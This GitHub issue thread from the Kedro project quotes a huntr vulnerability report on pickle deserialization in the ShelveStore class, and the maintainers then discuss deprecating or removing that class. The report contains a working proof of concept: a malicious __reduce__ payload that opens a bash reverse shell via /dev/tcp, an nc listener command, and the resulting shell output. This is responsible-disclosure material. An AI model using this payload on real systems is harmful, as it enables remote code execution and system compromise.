kedro-org / kedro

Kedro is a toolbox for production-ready data science. It uses software engineering best practices to help you create data engineering and data science pipelines that are reproducible, maintainable, and modular.
https://kedro.org
Apache License 2.0
9.84k stars 894 forks source link

Investigate "Potential security issue" in `ShelveStore` #4137

Closed merelcht closed 6 days ago

merelcht commented 1 week ago

Description

Investigate whether the "potential security issue" flagged in ShelveStore is something we need to address.

Context

The team received the following message:

Hi kedro-org,

A security researcher from huntr has reported a potential vulnerability in kedro.

Here's the report:

Submission date

2024-09-01T06:34:51.574Z

Title

Remote Code Execution (RCE) via Malicious Shelve File Upload in Kedro's ShelveStore

Severity

CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H = High (8.4)

Vulnerability Type

Deserialization of Untrusted Data

Description

Summary

A Remote Code Execution (RCE) vulnerability has been identified in the Kedro ShelveStore class. This vulnerability allows an attacker to execute arbitrary Python code via deserialization of malicious payloads, potentially leading to a full system compromise.

Vulnerability Details

Type: Remote Code Execution (RCE)

Class Affected: ShelveStore from kedro.framework.session.shelvestore

Version: 0.19.8

Description

The ShelveStore class uses Python's shelve module to manage session data. The shelve module relies on pickle for serialization, which can be exploited to execute arbitrary code. Crafting a malicious payload and storing it in the shelve file can lead to RCE when the payload is deserialized.

Prerequisites

Install the required Python package:

pip install kedro

Steps to Reproduce

Create Malicious Payload:

import os
import shelve
import pickle

# Define the malicious payload class
class MaliciousPayload:
    def __reduce__(self):
        return (os.system, ("bash -c 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'",))

path = "/home/cyfra/Bugbounty/huntr/kedro/test/shelve_data.db"

#malicious_data = pickle.dumps(MaliciousPayload())

# Save the malicious payload
print("Saving malicious payload...")
with shelve.open(path, writeback=True) as shelve_db:
    shelve_db['malicious'] = MaliciousPayload()

print("Malicious payload saved.")

Trigger the Vulnerability:

from kedro.framework.session.shelvestore import ShelveStore

# Define the path where the shelve file is stored
path = "/home/cyfra/Bugbounty/huntr/kedro/test/shelve_data.db"
# Define a unique session ID
session_id = "1234"  # Random session ID

# Initialize ShelveStore with the path and session ID
ShelveStore(path=path, session_id=session_id)

# Verify the exploit
print("Reverse shell executed successfully...")

Start a Listener:

nc -lvnp 4444

Observe that the server initiates a connection back to your machine, providing a reverse shell.

Verification:

┌──(cyfra㉿kali)-[~/Bugbounty/huntr/kedro]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 37648
┌──(venv)(cyfra㉿kali)-[~/Bugbounty/huntr/kedro/test]
└─$ whoami
whoami
cyfra

┌──(venv)(cyfra㉿kali)-[~/Bugbounty/huntr/kedro/test]
└─$ exit
exit
exit

┌──(cyfra㉿kali)-[~/Bugbounty/huntr/kedro]
└─$ 

Impact

The Remote Code Execution (RCE) vulnerability in Kedro's ShelveStore allows an attacker to execute arbitrary Python code by exploiting deserialization of a malicious payload. This can lead to severe consequences, including:

Full System Compromise:

Data Breach:

Occurrence(s) in code

https://github.com/kedro-org/kedro/blob/7a16e1a48a2b1433a39b334787c534569abc4dbe/kedro/framework/session/shelvestore.py#L16

Magic link (no sign-up) URL

https://huntr.com/bounties/96c77fef-93b2-4d4d-8cbe-57a718d8eea5/?token=cc8fefd0e45dda9df6128169a4877b80506802b80e4e037d7f76292aaa4cbb5523308d2ba446b5ccbae1951bc406d81dd7c7e3383deafcf3b6451bf54d2f1aec621722c5bb976cb82e211a9088eb6ed6d5cbf8708322e6c0b76af69bde84a483abe229293d5a5015168f5952c508e0a1b62b2407c1947fcb03affff0c0e07cfb2804177ee10dca3331356e32735c4d6b0d9748dd0f87655880084cb8f6624defb38697bf71428b84e3f3d497d68509b975b4f39223aa6af3150657a78ed9ab8e95a846924c1dbf65f0f5

This report is set to be automatically published on 2024-11-30T06:34:51.536Z UTC. We will remind you as the date gets closer.

You can delay the disclosure timeline, discuss with the researcher, request a fix and plenty more by following the magic link above.

If you have any questions, please get in touch!

ankatiyar commented 1 week ago

It seems like there is a genuine vulnerability with the shelve library for reading unverified files because shelve relies on pickle: https://docs.python.org/3/library/shelve.html#shelve-security

The ShelveStore in Kedro has both save() and read() methods. The read() method is called during a run when the store is initialised -

https://github.com/kedro-org/kedro/blob/a10690a77531ac662dba00c1f36d62ade5798534/kedro/framework/session/session.py#L201 https://github.com/kedro-org/kedro/blob/a10690a77531ac662dba00c1f36d62ade5798534/kedro/framework/session/store.py#L16-L19

One of the alternatives to shelve is json. One solution could be to implement a JSONstore and remove ShelveStore. .json is a more transparent file type. As a quick (eta: partial) solution, we could also add some path validation but we would then have to decide on some restrictions to put on the session store path. This path value can usually be set through settings.py and SESSION_STORE_ARGS by the user.

However, going through the Kedro docs, I didn't see any mention of the ShelveStore or any instructions on how to use it. If this feature is not used at all, we could consider deprecating and removing it without any alternatives.

Would love the team's thoughts on the way forward. @merelcht @astrojuanlu @lrcouto @ElenaKhaustova @noklam @DimedS

astrojuanlu commented 1 week ago

My reading of the situation is that pickle, hence shelve, is always insecure with untrusted data. And I'm not sure validating the path really helps.

I know removing the class in the next micro version would technically be a backwards-incompatible change, but (1) it's insecure, so people shouldn't be using it anyway, and (2) it's not documented anywhere. So I'm voting for removal.

merelcht commented 1 week ago

I'm also in favour of removing ShelveStore, but I would do it the proper way and deprecate it in the 0.19 series and fully remove in the next breaking release. This is a good lesson for us that while it's easy and non-breaking to add things to the public API, removal always comes at the price of a breaking release. So don't just add things because it's easy.

astrojuanlu commented 1 week ago

My only question is, will that mean that we'll have a public, unaddressed security issue in the codebase from 2024-11-30 (the date the report will be published) until we release 0.20? I know technically it would have no effect provided that the user doesn't use ShelveStore, but I'm wondering if it will raise some eyebrows...

merelcht commented 1 week ago

Technically we have had that issue since it was introduced in 2020.. Since it's a component that isn't widely used, we could do a TSC vote to agree on early removal in a non-breaking change?

DimedS commented 1 week ago

Technically we have had that issue since it was introduced in 2020.. Since it's a component that isn't widely used, we could do a TSC vote to agree on early removal in a non-breaking change?

I agree with the proposal, especially given the security concerns.

astrojuanlu commented 1 week ago

I managed to access the original report on Huntr, updated the description of the issue accordingly (since formatting was lost).

There's an ongoing conversation, as well as actions we can take.

image

For now, I acknowledged the report and added a cross reference to this thread.